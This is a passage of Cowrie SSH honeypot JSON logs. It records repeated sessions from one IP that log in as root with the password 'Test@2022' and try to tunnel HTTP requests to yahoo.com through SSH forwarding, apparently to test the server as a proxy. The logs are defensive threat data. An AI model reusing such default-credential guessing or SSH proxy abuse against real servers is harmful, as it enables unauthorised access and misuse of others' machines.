56-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.503145Z","src_ip":"213.209.150.239","session":"5bc1bf0406d6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.785685Z","src_ip":"213.209.150.239","session":"5bc1bf0406d6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":202,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:202","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.843389Z","session":"5bc1bf0406d6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.900114Z","src_ip":"213.209.150.239","session":"5bc1bf0406d6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":1492,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:1492","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.055083Z","session":"5bc1bf0406d6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.111763Z","src_ip":"213.209.150.239","session":"5bc1bf0406d6"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.169339Z","src_ip":"213.209.150.239","session":"5bc1bf0406d6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31508,"dst_ip":"1.2.3.4","dst_port":22,"session":"390e5d1b3ca9","protocol":"ssh","message":"New connection: 213.209.150.239:31508 (1.2.3.4:22) [session: 390e5d1b3ca9]","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.225102Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.225778Z","src_ip":"213.209.150.239","session":"390e5d1b3ca9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.282783Z","src_ip":"213.209.150.239","session":"390e5d1b3ca9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.565481Z","src_ip":"213.209.150.239","session":"390e5d1b3ca9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":7657,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:7657","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.624149Z","session":"390e5d1b3ca9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.681091Z","src_ip":"213.209.150.239","session":"390e5d1b3ca9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":11214,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:11214","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.835062Z","session":"390e5d1b3ca9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.891851Z","src_ip":"213.209.150.239","session":"390e5d1b3ca9"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.949138Z","src_ip":"213.209.150.239","session":"390e5d1b3ca9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31619,"dst_ip":"1.2.3.4","dst_port":22,"session":"72ad6aeb0dcb","protocol":"ssh","message":"New connection: 213.209.150.239:31619 (1.2.3.4:22) [session: 72ad6aeb0dcb]","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.995165Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.996067Z","src_ip":"213.209.150.239","session":"72ad6aeb0dcb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@open